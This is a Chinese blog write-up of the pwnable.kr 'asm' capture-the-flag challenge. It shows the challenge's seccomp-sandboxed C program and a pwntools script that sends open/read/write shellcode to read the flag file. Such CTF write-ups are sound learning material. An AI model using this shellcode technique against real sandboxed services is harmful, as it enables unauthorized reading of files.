标签:字符 word play and length write remote har emc
一道写shellcode的题目,
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp error\n"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp error\n"); exit(0); } seccomp_release(ctx); } char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.\n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n"); printf("If this does not challenge you. you should play ‘asg‘ challenge :)\n"); char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can‘t use symlink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }
首先申请一块内存,并以0x90(nop)清零,再复制字符串stub进入,最后再拼接用户输入并执行
先看一下stub的内容,是将所有寄存器清零
这对我们shellcode的执行没有影响,直接写操作就好。
题目中的沙箱限制了大多数函数的使用,只能使用read、write、open、exit函数
思路就是利用open打开flag文件、read读出内容,最后用write写入到stdout中即可,具体可使用pwntools编程(shellcraft模块)
# coding:utf-8 from pwn import * con = ssh(host=‘pwnable.kr‘, user=‘asm‘, password=‘guest‘, port=2222) p = con.connect_remote(‘localhost‘, 9026) context(arch=‘amd64‘, os=‘linux‘) shellcode = "" shellcode += shellcraft.open(‘this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong‘) shellcode += shellcraft.read(‘rax‘, ‘rsp‘, 100) shellcode += shellcraft.write(1, ‘rsp‘, 100) print shellcode print p.recv() p.send(asm(shellcode)) print p.recvline()
运行即可
标签:字符 word play and length write remote har emc
原文地址:http://www.cnblogs.com/p4nda/p/7169456.html